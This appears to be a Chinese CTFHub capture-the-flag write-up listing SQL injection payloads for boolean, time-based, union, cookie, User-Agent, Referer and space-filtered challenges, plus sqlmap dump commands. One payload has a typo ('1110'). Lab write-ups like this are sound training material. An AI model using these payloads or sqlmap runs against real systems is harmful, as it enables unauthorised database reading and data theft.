CTFHUB---SQL注入

SQL--布尔注入

1 and length(database())=4 

 

 我们利用count函数来判断sqli数据库里有几个表

1 and (select count(table_name) from information_schema.tables where table_schema='sqli' )<3

 

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109

 

sqlmap.py -u 登录的地址 -dbs

sqlmap.py -u 输入地址 -D sqli --tables来获取数据库里面的表(这种参数多做就知道了)

sqlmap.py -u 地址 -D sqli -T flag --columns --dump

 

时间注入

1 and if(length(database())=5,sleep(3),1)
1 and if(length(database())=4,sleep(3),1)
1 and if(length(database())=3,sleep(3),1)

 

1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1) ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=1110,sleep(3),1) ascii(l)=110

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1) ascii(i)=105

......

sqli数据库中表的数量

1 and if((select count(table_name) from information_schema.tables
where table_schema=database())=2,sleep(3),1)

 

1 and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
ascii(n)=110

 

1 and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
ascii(f)=102

 

MySQL结构

1 and 1=1

-1

1 order by 3

id=-1 union select 1,database()

 

-1 union select 1,database()
#得出表名:sqli

 

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
#得出表名

 

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='gicfxvzawq'
#得出列名

 

-1 union select 1,group_concat(mmtpisrhwd) from sqli.gicfxvzawq
#得出表中数据

 

Cookie注入

GET / HTTP/1.1
Host: challenge-d74d23b5527918d6.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: id=1; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Connection: close

 

 

Cookie: id=-1 union select 1,group_concat(qbqjfqgvtc) from sqli.xngjcgmzda

 

 

-1 union select 1,database()
#得出表名:sqli

 

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
#得出表名

 

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='gicfxvzawq'
#得出列名

 

-1 union select 1,group_concat(mmtpisrhwd) from sqli.gicfxvzawq
#得出表中数据

 

 

UA注入

 

GET / HTTP/1.1
Host: challenge-c1e9962261230a4e.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

User-Agent:-1 union select database(),1

User-Agent:-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

User-Agent:-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='sunjbkwrop'

 

过滤空格

 

0/**/union/**/select/**/1,2

 

0/**/union/**/select/**/1,database()/**/

 

0/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

 

0/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='iyowhwbjtb'

 

0/**/union/**/select/**/1,group_concat(nzrquebpjw)/**/from/**/iyowhwbjtb

 

 

Refer注入

 

referer:id=-1 union select database(),1

 

referer:id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

 

referer:-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='rntemniypk'

 

referer:-1 union select 1,group_concat(jsxfbzclrh) from sqli.rntemniypk

 

posted @ 2022-04-06 21:34  TinKode  阅读(371)  评论(0)    收藏  举报